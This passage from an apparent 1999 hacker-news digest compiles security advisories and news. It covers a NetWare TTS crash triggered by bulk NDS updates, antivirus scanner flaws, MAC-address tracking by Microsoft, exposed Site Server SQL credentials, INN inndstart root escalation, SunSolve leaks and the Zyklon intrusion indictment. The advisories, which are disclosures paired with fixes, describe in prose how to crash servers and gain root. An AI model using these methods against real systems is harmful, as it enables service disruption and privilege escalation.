with administrative access can do this, but they could obviously do other acts that could be just as destructive, if not more so. What is needed is the ability to create a large number of NDS updates very quickly. For example, if a user has the ability to create a container and add objects to it, them that user has enough authority to potentially cause problems to TTS. Creating a container, dropping a few hundred objects into the container via drag-and-drop and then deleting the container should suffice. If the server lacks a large amount of free memory, the server will quite possibly abend. In other cases, TTS is disabled, which is a form of Denial of Service. As the messages are sent across to other servers containing NDS replicas, they too may crash. In our test environment we were able to crash two servers (Netware 4.1 and Netware 4.11) with a the scenario of creating a container, adding a few hundred users, and then deleting the container. Solution/Workaround ------------------- NMRC has heard reports of as many as a dozen servers crashing within a couple of minutes of each other, so apply the latest Service Pack for Netware 4.x on all servers or upgrade to Netware 5. Comments -------- Novell has already been notified and they are obviously aware of the TTS limitations (refer to the May 1997 TID 2908153 at http://support.novell.com/cgi-bin/search/tidfinder.cgi?2908153 for an example). Per Novell the latest patches for Netware 4.x correct the problem, and Netware 5 does not have the problem at all. Thanks to Michel Labelle for notifying NMRC about this problem. _______________________________________________________________________________ See http://www.nmrc.org/news/ for more advisories. Simple Nomad // thegnome@nmrc.org // ....no rest for the Wicca'd.... www.nmrc.org // @HWA 04.0 InoculateIT for Windows NT 4.53 scans inbox but misses other inbound msgs ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 12 May 1999 09:52:59 -0500 From: Bob Duffett To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: InoculateIT 4.53 Real-Time Exchange Scanner Flawed Manufacturer: Computer Associates Product: InoculateIT for Windows NT v4.53 Build 169, Agent for Microsoft Exchange This product has a major defect. We have it running on our Exchange Server with 1,300 mailboxes yet viruses keep spreading directly from email. I did some investigating tonight and found the problem. It is ONLY scanning the Inbox folder tree. This would sound simply like a poor design but it is MUCH worse. The Inbox Rules Wizard can store the user's rules on the Exchange Server which will move a message to a specific folder without the message ever being placed in a user's inbox. This causes it to comletely by-pass the InoculateIT Real-Time Scanner. My CA rep confirmed the problem with CA support who had no work-around available at this time. Bob University of Alabama at Birmingham Cancer Center Technical Services Facility (CCTSF) mailto:Bob.Duffett@ccc.uab.edu @HWA 04.1 CA's Inoculan software vulnerabilities on NT Workstation SP3 or SP4 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Sat, 8 May 1999 14:58:08 +1000 From: Glenn Corbett To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Insecure Bahaviour in Inoculan Client Russ, A problem has been discovered with the InocuLAN client on Windows NT workstations. If an account lockout policy is present on a Windows NT domain, large numbers of repeating account lockouts can occur. Description: Incorrect password events (event id 529) are being logged from workstations when running applications from UNC paths. The username that has logged the incorrect password is different to that of the logged on user. Configuration: Windows NT workstation SP3 or SP4, with InocuLAN V4.0(373) or InocuLAN V4.0(375) To reproduce the problem: 1. Install InocuLAN V4.0(373) or V4.0(375) onto an NT workstation with SP3 or SP4 (SP5 not tested yet) 2. Configure InocuLAN as described below: Options: Direction - Incoming and Outgoing files Action upon Virus detection - Cure File Cure Action for Macro Viruses - Remove Infected Macros Copy File before Cure Rename File when Cure Fails Rename Extension - AVB Move Directory - C:\Inoculan\VIRUS Protected Areas: Protect Floppy Drives Protect Network Drives Protect CD-ROM Drives Scan Type - Secure Scan 3. Reboot the workstation 4. Log into WorkstationA as Domain UserA, Logout Domain UserA 5. From another workstation change the password of Domain UserA 6. Log into WorkstationA as Domain UserB. 7. From WorkstationA run an application from a remote share on WorkstationX where Logon and Logoff, Success/Failure, are being audited. Run an application from the cmd window using a UNC path with no other connections to the WorkstationX. Eg \\WorkstationX\shareX\notepad 8. The application will take several seconds to run and there will be a failure security event (529) for UserA from Workstation A. From server manager remotely stop the Cheyenne InocuLAN Anti-Virus Server on Workstation A and repeat step 7. You will see that the application will start immediately and no errors will be recorded in the security event log. The above problem also causes problems when running logon scripts. If an application is called from the logon script and that application does not exit on the local workstation, the version in the logon share will be run. As soon as the application in the logon script is called there is an event 529 error recorded on the logon server security event log. Even if subsequent different users log into Workstation A, these problem will continue until the workstation is rebooted. This behaviour can also been seen if in Step 4, a local userA logs on. The subsequent error 529's have the local userA account in the security event. It appears as though InocuLAN is storing the user credentials for the first logged on user and using them to scan network drives for virus' even when a different user subsequently logs on until workstation reboot. It is not yet apparent if this username / password is being stored in the registry / temporary file or memory, and therefore open to exploit. We do not see this problem with InocuLAN V4.0 (4.0 Service Pack 1). CA Have been notified earlier this week, no respose as yet. Thanks Glenn Corbett CRISP Project Server / Workstation Team Leader Compaq Computer Corp, Australia. Glenn.Corbett@compaq.com (Work) Glenn.Corbett@bigpond.com (Private) -------------------------------------------------------------------------------- Date: Fri, 14 May 1999 14:49:17 -0400 From: ARCNT To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: FW: NTBUGTRAQ response - URGENT The issue reported to NTBUGTRAQ regarding InocuLAN v4.0 build 373 and 375 implies that username/password information is stored "somewhere" on the client side and as such could potentially be exploited. That assertion is inaccurate, the username/password credential combination is NOT stored on the client side by Inoculan, (which is why the efforts to locate these credentials in shared memory, in a file or in the registry have been unsuccessful). Clearly, in order for the InocuLAN real-time scanner to access files on a remote server, the software must have valid security contexts in place to permit the requisite access to the file systems and files. The techniques utilized by Inoculan (using low level, but fully documented and supported standard vendor API's) do NOT require that traditional user credentials (user account/ password) be presented in order to gain the necessary access. Rather, Inoculan is able to gain the required access in a completely secure manner without prompting for username and password information. In addition, it is important to point out that NO attempt to retrieve credential data is done without the user's explicit advance knowledge and consent. Computation/generation of the requisite credential information is done at Inoculan driver initialization time, and can be easily refreshed by simply rebooting the machine (which of course will in turn result in Inoculan initialization routines being invoked as part of system restart). The particular behaviour observed and reported can be attributed to the fact that AFTER Inoculan initialization was completed, the user access credentials for the user in question were modified, rendering the originally computed credential that Inoculan would otherwise utilize, invalid. An enhancement is being developed presently to provide a configuration setting that will instruct the Inoculan real-time scanner to recompute credentials automatically thus eliminating the need to reboot the client machine. This enhancement will be available by 17:00 Eastern US time, May 21, 1999, and can be downloaded from the standard Computer Associates support web sites, (http://support.cai.com). We appreciate the efforts involved in bringing this issue to our attention and look forward to being able to provide you continued responsive service in the future ! InocuLAN Technical Support @HWA 05.0 [ISN] Everywhere your MAC address shows up ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 11 May 1999 21:55:22 -0600 (MDT) From: cult hero To: InfoSec News Subject: [ISN] Everywhere your MAC address shows up Forwarded From: MICROSOFT'S HEAVY HAND IN THE COOKIE JAR A special report from YEOW - Barry Simon. See the Woody's Office Watch discussion and details on the Office 97 privacy problem. Issues 4.11 and 4.12 Because of the important Internet Explorer 5 coverage some regular WWW features have been held over to the next issue. We reported earlier on the brouhaha over the inclusion of hardware IDs in the Pentium III chip and privacy advocates' concerns about it. Turns out many of us already have hardware IDs on our systems since all Ethernet cards have a MAC (stands for 'Media Access Control', whatever that means!), a six byte ID number that networks need to be sure to properly direct network packets. Of course, the Pentium III ID's are more serious since many home systems don't (yet) have network cards and the biggest privacy concerns are in the consumer space. Due to wonderful sleuthing by Richard Smith of PharLap (who earlier located the April Fool's Bug discussed in WWW issue 2.2), the world has discovered a number of places that Microsoft has been using these MACs - in Windows 98 IDs, in Office 97 documents and in the microsoft.com cookies. And privacy concerns result from all these uses. To understand the issues, try a few experiments. First, you'll need your MAC assuming you have an Ethernet adapter. With Windows 9x, run the program winipcfg from the Run box. It should load with a dropdown that says 'PPP Adapter'. Change the dropdown to the name of your hardware adapter. The Adapter Address field will say something like 00-70-06-9A-8E-43. That's your MAC. Each byte is presented as two hex digits (0 through 9 or A-F) for a 12 character ASCII string which is what Microsoft uses. With Windows NT, run instead winmsd, go to the Network tab and pick Transports and you'll get the MAC. For the next experiment, you'll need to look at a Word 97 document in text mode. You can't do this with Word. If you have Quick View Plus (plain Quick View won't do), open a Word doc in QVP, go to the View menu and pick View as Text. Or make a small Word doc, save it and rename it to a .txt extension and open it in Notepad. Now search for the string PID. You should find _PID_ GUID and shortly afterwards, a long hex string inside braces such as {F96EB3B9-C9F1-11D2-95EB-0060089BB2DA}. Those 12 hex digits at the end will be your MAC. Yup, every Word doc, every Excel spreadsheet and every Power Point presentation is branded with an identifier showing the PC it came from. If your boss has a Word memo you sent her and a copy of the anonymous whistle blowing attachment you sent to the Feds, she could determine they were made on the same machine. (Of course, if you aren't careful, the document includes an author name and if any corrections were made, it may say who made the corrections. Within the next few days, Microsoft expects to post a white paper on all the 'metadata'; embedded in Office documents). To run the next experiments, you'll need Windows 98, so I'll tell you what happens so you can follow along in any event. In your Windows directory, you'll find a file called reginfo.txt. Open it in Notepad and look for a line called HWID; it ends with your MAC. This file is created when you install Windows and is transmitted to Microsoft when you register. And here's the clincher: even if you check the box not to send hardware information, this data is sent. And it's even worse - the data collection code is in an ActiveX control that can be used by any Internet site out there. Pharlap has a demo to illustrate this: go there and it displays your MAC on screen. Any site knowing of this control could track MACs of all Windows 98 visitors to their sites. There is also a demo and discussion at Windows Magazine. By the way, this ActiveX control is also in the Windows 2000 beta so if Microsoft hadn't been found out, NT users would have been hit next. Next, go to your cookies directory and open the text file whose name ends with microsoft.txt (it probably has a username@ in front where username is your login name). In it you'll find a string called GUID that includes your MAC (GUID, by the way, is short for Global Unique Identifier). This cookie is sent to www.microsoft.com every time you visit that site. You may have realized they were making a cookie when you registered at their site but I bet you didn't realize they were adding hardware information without your permission. (Actually the Win98 Registration Wizard made the cookie before you went to the Microsoft site.) You might want to search your Registry for your MAC as a string. I found mine numerous times - two in suspicious places viz a viz Microsoft. It's part of a key for Media Player called Client ID (is this passed on to the Media Player servers?) and as part of a key HKCU\Identities that seems to be connected with Outlook Express 5.0. There is certainly plenty here for the paranoid. Microsoft is collecting and storing in its databases unique hardware information. That information brands your documents, and is always sent on when you access Microsoft's site. One has to consider the possibility that Microsoft is keeping some master database tracking all sorts of interactions based on your MAC. And one has to allow the possibility that the MAC will be encoded in the information that is sent by the Office Registration Wizard in Office 2000. Microsoft has reacted vigorously to the developments in this story. They have two customer letters ( here and here) on their site in which they promise to remove the hardware ID part of the registration wizard in a Win98 upgrade. They also promise to delete 'any hardware ID information that may have been inadvertently gathered without the customer having chosen to provide Microsoft with this information.' Tools have already been posted to remove branding from Office applications and from already-created docs and there is a promise that branding will be removed >from the final version of Office 2000. Beyond these actions, there has been a full court spin operation. Some MS representatives have (unwisely in my opinion) attempted to minimize the issue. There have been claims that the doc branding was a part of a feature, never implement, intended solely to help network administrators. There has been harping on the fact that the MAC only identifies a machine but not an individual - true but not of much comfort in many cases. We've been told that Windows 98 sending a HWID even if you said not to send hardware information was a bug, not a feature - an inadvertent programming error. There's been no new statement about the use of MACs in cookies which I find most disturbing. We've been told by Microsoft representatives that the Office 2000 Registration Wizard doesn't collect MACs or anything like a MAC. Indeed, they claim that while the Office CD serial number can be reconstructed >from the 16 byte code sent by the wizard, the hardware info does not allow reconstruction. In particular, if the different CDs were used on the same machine, they'd be unable to tell that the codes came from the same machine. _____ The problem with the Microsoft position is that the company has so little credibility and there is too much of a pattern here. We pride ourselves on taking a middle road on Microsoft at Woody's newsletters. We don't hesitate to put their feet to the fire but, on the other hand, we don't take the position that Microsoft is the root of all evil and everything they say and do is two faced. That said, Woody's middle name isn't Polly and mine isn't Anna. Microsoft has amply demonstrated that it is company policy to, er, shade the truth when doing so serves a perceived business purpose. We see it in the leaked disinformation about Windows 2000 shipping this fall, we've seen it in their previous reactions to accusations and we saw it too often in the testimony at the DOJ trial. That means one has to take skeptically every statement that Microsoft has made about the MAC problem. I'm inclined to believe that branding of Office documents wasn't part of a plot to link together our entire lives in Microsoft's databases. But I'm insulted that they try to bat their eyelashes and claim to us that the sending of the HWID even when you told them not to send hardware info was an inadvertent error. And I'm concerned that we have no way of knowing that they've kept their promise to remove hardware IDs from their internal databases. Indeed, my presumption is that they will not. I worry that Microsoft is tucking all sorts of things into the holes they aren't discussing. While they have said they'll stop using HWID, they have also said they'll continue to use the MSID number which is created by the Windows 98 Registration wizard. And, guess what? As discovered by Peter Siering at the German publication C'T Magazine, the registration wizard also creates a Microsoft cookie that includes MSID. So even after the apologies and changes, it seems Microsoft will be quite capable of tracking us and linking online visits to registration information. It's interesting about credibility. There was also an Intel slip reported recently that they claimed was inadvertent. Apparently some mobile Pentium II's shipped with hardware IDs even though these were only announced for Pentium III's. Intel's explanation is that they experimented with this feature in the manufacturing process for the mobile Pentium II but it was supposed to be disabled before shipping. One line inadvertently didn't do the disabling. Intel's credibility is such that I'm willing to accept their claim of inadvertence here. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 06.0 [ALERT] Site Server 3.0 May Expose SQL IDs and PSWs ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 11 May 1999 16:27:38 -0600 From: Mark To: BUGTRAQ@netspace.org Subject: [ALERT] Site Server 3.0 May Expose SQL IDs and PSWs ==================================================== Site Server's AdSamples Directory Reveals ID and PSW Discovered by Andrey Kruchkov ==================================================== VERSIONS EFFECTED * Tested on Microsoft Site Server 3.0 Commerce Edition DESCRIPTION Site Server allows the installation of an AdSamples directory, which serves to demonstrate the capabilities of the Ad Server component. If this directory is installed and left open to the public without limiting directory permissions, a user can obtain a site configuration file (SITE.CSC) that contains sensitive information pertaining to an SQL database. This information could contain a DSN, as well as a a username and password used by the Ad Server to access the SQL server database. COMMENTS Andrey reported this problem to NTSECURITY.NET and has informed Microsoft of this issue. Andrey points out an easy way to eliminate this risk: Remove the "AdSamples" virtual directory from the DEFAULT root Web site, or change security permissions for this folder to sufficiently restrict access. If you must provide loose access to this virtual directory for some strange reason, then you should at least adjust the security permissions for the SITE.CSC file so that it's not available for viewing. Also keep in mind that there may be numerous other SITE.CSC files under your Site Server installation, all of which need to be secured. For a URL that demonstrates the problem, please visit http://www.ntsecurity.net/scripts/loader.asp?iD=/security/siteserver-2.htm This is probably a great time to remind people once again to NEVER install sample content on production servers and to NEVER use the built-in IIS DEFAULT Web site without first thoroughly investigating the implications of doing so. Thanks, Mark - http://www.ntsecurity.net @HWA 07.0 inndstart vulnerability, possible root compromise ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 11 May 1999 11:24:06 -0400 From: Forrest J. Cavalier III Reply-To: userkt-l@mibsoftware.com To: BUGTRAQ@netspace.org Subject: INN 2.0 and higher. Root compromise potential Copyright 1999 Forrest J. Cavalier III, Mib Software This information is provided by Mib Software, www.mibsoftware.com. This notice can be distributed without limitation. Summary: -------- INN is open source NNTP (Usenet) server software from the Internet Software Consortium. http://www.isc.org/ In some cases, there is potential for the local news user, or any local user, to execute arbitrary code as root. The two vulnerabilities reported below have already been discussed in the Usenet newsgroup news.software.nntp. Therefore, the vendor is being sent this notice now, and was not notified previously. INN is communications software. Mib Software knows of no buffer overrun exploits of the affected versions of INN, but the possibility cannot be ruled out. This would be the only way a root compromise using a remote connection would be possible. Background: ----------- Since NNTP defines a privileged port (119), a SUID root wrapper, inndstart, binds to the port, and then is intended to drop root privileges, setting the UID to user news before exec() innd. In some cases, this behavior can be altered to gain privileges. ------------------------------------------------------------ Vulnerability 1 (pathrun should not be trusted information) ------------------------------------------------------------ Summary: It is possible for the news user to control the behavior of the inndstart program so that root privileges are not dropped, and execute arbitrary programs as root. Versions affected: INN 2.0 and higher. Versions not affected: INN 1.7.2 and lower. Details: inndstart determines the target UID and GID from the UID and GID of a directory which is normally owned by user news, group news. The directory which is checked can be changed be editing the "pathrun" parameter in the inn.conf configuration file. By specifying a directory with appropriate ownership, inndstart can exec() running as any user, including root. During the course of normal operation, innd forks() and executes many child processes, and it is relatively simple to run arbitrary code from innd. Solution: modify the source file innd/inndstart.c to use a hard coded pathrun, instead of the structure member innconf->pathrun. Workaround: There is no workaround. The source must be modified. ------------------------------------------------------------------ Vulnerability 2 (inndstart should be protected, INNCONF environment variable should not be trusted.) ------------------------------------------------------------------ Versions affected: INN 2.x after July 9, 1998 (including INN 2.1 and higher.) Versions not affected: INN 1.7.2 and lower. Details: Normally, the SUID root program inndstart, should be in a directory accessible only by user news. In some installations, this program is accessible to all local users. On July 9, 1998 a source code change was introduced which obtains the path of the configuration file from the environment variable INNCONF. In those installations with inndstart accessible to local users, a local user can set INNCONF in the environment and determine the behavior of inndstart so that abitrary programs are executed. If the pathrun vulnerability above is fixed, these programs run as user news, if not fixed, they run as user root. Solution: Install inndstart in a directory with 0700 permissions owned by user news. ------------------------------------------------------------------- Forrest J. Cavalier III, Mib Software, INN customization and consulting 'Pay-as-you-go' commercial support for INN: Only $64/hour! Searchable hypertext INN docs, FAQ, RFCs, etc: 650+ pages. http://www.mibsoftware.com/innsup.htm @HWA 08.0 Sunsolve.Database leaks crucial info about itself and its users ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 11 May 1999 19:22:59 +0100 From: "Robson, Ken" To: BUGTRAQ@netspace.org Subject: Sun Microsystems Leaks extensive Amounts of Information About Itself & It's Customers Through Its Sunsolve Database... Hi Folks, I have just been scouring Sun's Bug Reports for some information and I discovered that you can easily trawl for useful information about both Sun and its clients. Information exposed includes:- * Copies of /etc/passwd (i.e. user names) * Copies of /etc/shadow (i.e. encrypted passwords) * Configuration of network services (i.e. inetd.conf) It is trivial to put together searches that glean this for some of their customers. Whilst the contract services restrictions are in place for accessing these accounts, logins must be in wide circulation. I know 3 or 4 accounts from various past employers myself. When logging a support call I do not often consider what might happen to the call notes. I am sure that Sun are not the only company doing this and this is not aimed at Sun in particular, they are just an example. Serious consideration should be given to what information you are prepared to pass to those who support you - do you trust the rest of their customers (at best) or the entire internet (at worst). Anyway not earth shattering but food for thought. Regards, Ken. PS - Please do not interpret the domain that this mail comes from as any indication that I work for the European Bank for Reconstruction & Development. I in fact contract to Hewlett Packard and am simply based at the bank - all the opinions expressed above are my own and have nothing to do with either of these organisations. ----------------------------------------------------------------------------- Date: Wed, 12 May 1999 09:56:00 -0700 From: Alan Coopersmith To: BUGTRAQ@netspace.org Subject: Re: Sun Microsystems Leaks extensive Amounts of Information About Itself & It's Customers Through Its Sunsolve Database > When logging a support call I do not often consider what might happen to the > call notes. I am sure that Sun are not the only company doing this and this > is not aimed at Sun in particular, they are just an example. Serious > consideration should be given to what information you are prepared to pass > to those who support you - do you trust the rest of their customers (at > best) or the entire internet (at worst). The actual service order notes are not available to customers through SunSolve - but parts of bug reports that may be generated by them are. At least a few years ago when I worked in SunService they reminded us not to put customer information in the public part of bug reports, but there was no review system to make sure we didn't screw up. If you want to protect yourself, make sure that if your call results in a bug report you go to SunSolve and review the public copy to make sure there's nothing in there you wouldn't want others to see and if there is, call up your service rep and make them move it to the sun-internal-access-only section of the bug report. Disclaimer: I no longer work in Tech Support at Sun and do not and cannot speak for SunService or whatever they're called after the latest "realignment of the Sun planets". -- ________________________________________________________________________ Alan Coopersmith alanc@godzilla.EECS.Berkeley.EDU Univ. of California at Berkeley http://soar.Berkeley.EDU/~alanc/ aka: alanc@{CSUA,OCF,CS,BMRC,EECS,ucsee.eecs,cory.eecs}.Berkeley.EDU @HWA 09.0 [ISN] Asia is wide open to virus, hacker attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: William Knowles http://www.feer.com/Restricted/99may_20/tech.html (Feer.com) [5.20.99] How personal are personal computers? At the rate Asian companies and individuals are exposing their computers to on-line infection and intrusion, they may as well drop the "P" from PC. The information highways are proving very public, but many Asians are travelling naked and defenceless. Computer viruses are the region's biggest problem. Two major virus attacks in March and April crippled hundreds of thousands of Asia's computers. Then in late April, the Singapore government was caught snooping into PCs without seeking permission from their owners. The incidents have highlighted the need to protect PCs from viruses and unwanted intruders--protection that's sorely lacking in the region. While multinational companies now keep a constant vigil on the security of their computer networks, many other companies and individuals have left themselves vulnerable. To protect against viruses, they need to install and diligently update antivirus software, which costs an average of $50 per program for personal use. Large companies have for many years installed virtual "firewalls" that combine antivirus, antihacking and other protective software, but antihacking and personal-data security programs are only just becoming commercially available to individual PC users. The latest virus hit more than 650,000 computers in Asia. Named Chernobyl, it remained dormant until April 26, the 13th anniversary of the Chernobyl nuclear-plant disaster in Ukraine. On that day, the virus disabled computers, destroyed programs and erased large amounts of stored information. Xinhua news agency reported that 360,000 PCs were affected in China. The virus's Taiwanese creator, 24-year-old Chen Ing-hau, said he had wanted to cause mayhem on the mainland. Chen was arrested but released without charge due to a lack of plaintiffs in Taiwan, where no infections were reported. "Chernobyl's been known about and treatable for over a year and still people were caught out," says Daniel Schneersohn, Hong Kong-based regional director for Symantec, an American maker of antivirus software. He says many customers had such software installed, but had simply not activated it. Half of the damaged PCs in China, for instance, had protective software that was not turned on. Although most corporate PCs shipped to South Korea since 1997 contain antivirus software, Chernobyl infected an estimated 250,000 PCs in that country. Many companies allow their employees to turn off antivirus software, which can slow down the computer while it monitors infections. Many users had failed to keep installed software up-to-date. "It's not enough to buy antivirus software and install it or even activate it," says Schneersohn. "You've got to update the software--the antivirus companies update the virus threat lists every week." Eric Sheridan, director of Asia business development for U.S. computer-systems company Corporate Software & Technology, says most of his customers, almost all multinationals, escaped Chernobyl unscathed. "Our customers all have ongoing contracts for security and virus protection, or they have good in-house teams at work," he explains. Most at risk are individual PC users and companies with less sophisticated information-technology departments, Sheridan says, especially as they make increasing use of the Internet. "Once you have a few offices up and on-line you have to take outside threats like viruses and hacking seriously." Schneersohn agrees that while multinational firms are taking these threats seriously, the rest of the Asia-Pacific isn't. "Even some big listed companies in Hong Kong don't use antivirus protection," he says. Smaller businesses in particular have turned to pirated antivirus programs during the economic crisis to keep costs down. But they lose the advantages of software support and advice, says Schneersohn. "It's software use at its lowest level and that's why the highest level of infections are in small businesses and homes" where pirated programs are most prevalent. Still, even pirated-software users could have protected themselves by downloading updates of antivirus programs from the manufacturer's Web site. For now, most software companies don't bother to trace pirates who download updates, says Schneersohn--although Symantec's next generation of antivirus software will update only registered users. Just as the dust settled from the Chernobyl attack, Internet users in Singapore were faced with a more organized affront to their computer privacy. SingNet, an Internet service provider, acknowledged that it asked the Home Affairs Ministry's IT security unit to scan its customers' PCs for viruses without their consent. SingNet is owned by Singapore Telecom, which is in turn 80%-owned by the government. SingNet's actions only came to light because a student, who had downloaded antihacker software from the Internet onto her PC, traced the scan back to the ministry. SingNet's home page on the Web apologizes for the intrusion--"We should have informed you first," it says--and invites visitors to voluntarily submit to the virus search instead. The company says the scanning did not "enter" any PCs nor unveil any personal data. Also, SingNet claims it found 900 PCs infected with "trojan horse" viruses that allow hackers to enter computers via the Internet and take almost complete control. The SingNet action and the discovery of the "trojan horse" viruses highlight the ease with which PCs can be snooped on while on-line. "If breaking in is so easy, some less scrupulous companies may well start thinking that it might be worth throwing a few bucks at some kid to look into their competitors' files," says Schneersohn. For personal and small-business users, encryption is one option for protecting confidential data from hackers. But use of encryption is either illegal or legally untested in many Asian countries. A second option is to remove confidential data to a separate disk drive and access it only when the user is off-line. To protect stored data while the user is on-line, demand will probably grow among personal and small-business PC owners for simpler versions of the "firewalls" that large companies use to protect their computer networks from intrusion. Schneersohn says antivirus software makers are already looking into the market. "Many people want to block access to personal files to all third parties--you could call it a personal firewall. They simply want to regain control of what's happening on their computers." -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 10.0 More on Zyklon's legal troubles ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Zyklon Busted contributed by Space Rogue HNN first reported this news early Friday morning and has now learned more details. Zyklon, (Eric Burns) has now been charged with three counts of unlawful computer intrusion. The counts are believed to be for alleged attacks on the USIA (US Information Agency) web site, which as hosted by Electric Press in Herndon, Va. Other companies allegedly attacked where LaserNet in Fairfax, Va.; and Issue Dynamic Inc., which also has machines in VA. The total damage estimates are listed as $15,000. (Which seem a little low compared to other similar cases) It is believed that the Secret Service will also question Zyklon in connection to any involvement he may or may not have had in the recent whitehouse.gov crack. Copy of the Indictment http://www.hackernews.com/orig/zyklon.html MSNBC http://www.msnbc.com/news/269584.asp ABC News http://abcnews.go.com/sections/tech/DailyNews/whitehousehacker990515.html IN THE UNITED STATES DISTRICT COURT FOR THE EASTERN DISTRICT OF VIRGINIA Alexandria Division UNITED STATES OF AMERICA ) ) v. ) Criminal No. ) ) Counts 1-3: Computer Intrusion ERIC BURNS ) (18 U.S.C. $ 1030(a)(5) also known as "Zyklon" ) ) Defendant. ) INDICTMENT May 1999 Term - At Alexandria, Virginia COUNT 1 THE GRAND JURY CHARGES THAT: From on or about August 25, 1998, through on or about January 22, 1998, in the Eastern District of Virginia and elsewhere, ERIC BRUNS, also known as "Zyklon," defendant herein, knowingly and intentionally cuased transmissions from a computer in Shoreline, Washington, of progress, information, codes, and commands, and as a result of such conduct, intentionally caused damage without authorization to a computer of Electric Press, Kerndon, Virginia, which was a protected computer used by and for the United States Information Agency, and agency of the United States Government, and the conduct affected the use of the computer by and for the government and caused loss aggregating at least $5,000 to at least one individual between August 25, 1998 and March 1, 1999. (In violation of Title 18, United States Code, Section 1030(a)(5)(A).) COUNT 2 THE GRAND JURY CHARGES THAT: From on or about December 28, 1998, through on or about December 31, 1998, in the Eastern District of Virginia and elsewhere, ERIC BURNS, also know as "Zyklon," the defendant herein, knowingly and intentionally caused transmissions from a computer in Shoreline, Washington, of programs, information, codes, and commands, and as a result of such conduct, intentionally caused damage without authorization to a computer of Computer Tech Services, doing business as LaserNet, in Fairfax, Virginia, which was a protected computer used in interstate commerce and communication, and caused loss aggragating at least $5,000 to at least one individual between December 28, 1998, and March 1, 1999. (In violation of Title 18, United States Code, Section 1030(a)(5)(A).) COUNT 3 THE GRAND JURY CHARGES THAT: From on or about December 28, 1998, through on or about January 11, 1999, in the Eastern District of Virginia and elsewhere, ERIC BURNS, also known as "Zyklon," defendant herein, knowingly and intentionally caused the transmission from a computer in Shoreline, Washington, of programs, information, codes, and commands, and as a result of such conduct, intentionally caused damage without authorization to computers operated by Issue Dynamics, Inc. in Alexandria, Virginia, and Washington, D.C., which were protected computers used in interstate commerce and communications, and caused loss aggragating at least $5,000 to at least one individual between December 28, 1998, and March 1, 1999. (In violation of Title 18, United States Code, Section 1030(a)(5)(A).) A TRUE BILL: __________________________ FOREPERSON UNITED STATES GRAND JURY (signed) ______________________ Helen F. Fahey United States Attorney (signed) ______________________ Justin W. Williams Assistant United States Attorney Chief, Criminal Division (signed) ______________________ Jack Henly Assistant United States Attorney Alleged USIA site hacker indicted Grand jury hands down three counts of computer intrusion against �Zyklon� By Brock N. Meeks MSNBC May 14 A federal grand jury in Virginia Thursday charged a Washington state man, Eric Burns, with three counts of computer break-ins, including two high-profile hacks of the United States Information Agency. Burns, well-known in the electronic underground by his code name Zyklon, has also been questioned by the Secret Service in conjunction with other government site break-ins, MSNBC has learned. BURNS� CODE NAME, MENTIONED in court papers, taken from the poison gas used by the Nazis in concentration camps, was mentioned on the recent hack of the White House Web site in a shout out (hacker slang for words of praise for a fellow hacker). However, no details were available as to whether Burns was being questioned by the Secret Service in conjunction with the White House hack. One source told MSNBC, after speaking with Burns, that the Secret Service questioned him about other government sites but not the White House hack.The Secret Service declined to comment. However, a source familiar with the investigation, which was carried out by the Computer Crimes Division of the Federal Bureau of Investigation, confirmed that the bureau acknowledged another agency is also investigating Burns. Calls to the FBI to discuss their investigation of Burns were not returned. The three alleged break-ins charged to Burns took place from August of last year to January, according to court papers. Attempts to contact Burns, who lives in Shoreline, Wash., by phone, were unsuccessful. One source who spoke to Burns said he was on a plane and heading for a court appearance in Virginia on Monday. The three counts in the indictment are for attacks on the computers of Electric Press in Herndon, Va., which hosts the USIA Web site; LaserNet in Fairfax, Va.; and Issue Dynamic Inc., which has computers in Alexandria, Va., and Washington, D.C. Each count mentions damages of at least $5,000. The attack on USIA�s web site in January was particularly damaging and was the second time it had been allegedly hacked by Burns. Each of those hacks was signed by Zyklon. USIA, which operates the Voice of America broadcasts, is an extremely busy site; it�s a clearinghouse for U.S. information and heavily used by foreigners. The first USIA hack, which occurred in August, destroyed a lot of the site�s data, according to published reports at the time. The second break-in seemed to be Burns� way of working out his frustrations owing to a lost love. Hack by Zyklon. Crystal, I love, (you?) the hacked site said. In another Zyklon hacked site, this one of BellSouth, he laments that he has massive depression, that he�s a loser and that because of it I will never have my Crystal I will never be happy and I hope I goto [sic] prison and die. Another hack attributed to Zyklon is that of the official Chinese human rights page, as seen on the Hacker News Network, which mirrors the hacked site. This hack appears to be an act of so-called hacktivism in which hackers break into systems, own them and put up politically charged speech. -=- ABC news; Teen Hacker Indicted �Zyklon� Not Charged in White House Attack By Ted Bridis The Associated Press W A S H I N G T O N, May 15 A teen-ager identified as a computer hacker whose name appeared on the Internet site for the White House after vandals altered it this week has been indicted in Virginia on charges he broke into another government computer. A grand jury indicted Eric Burns, 19, on three counts of computer intrusion. Burns, reportedly known on the Internet as Zyklon, was accused of breaking into a computer between August 1998 and January 1999 in northern Virginia that is used by the U.S. Information Agency. Zyklon was one of a dozen names listed on the hacked version of the White House Web site, which was altered overnight Sunday for a few minutes before government computers automatically detected the intrusion. �A Serious Effort� The indictment returned Thursday also accuses Burns of breaking into two other computers, one owned by LaserNet of Fairfax, Va., and the other by Issue Dynamics of Washington. Sam Simon of Issue Dynamics said he was cooperating with the FBI. We firmly believe that computer criminals need to be identified, prosecuted and caught, and 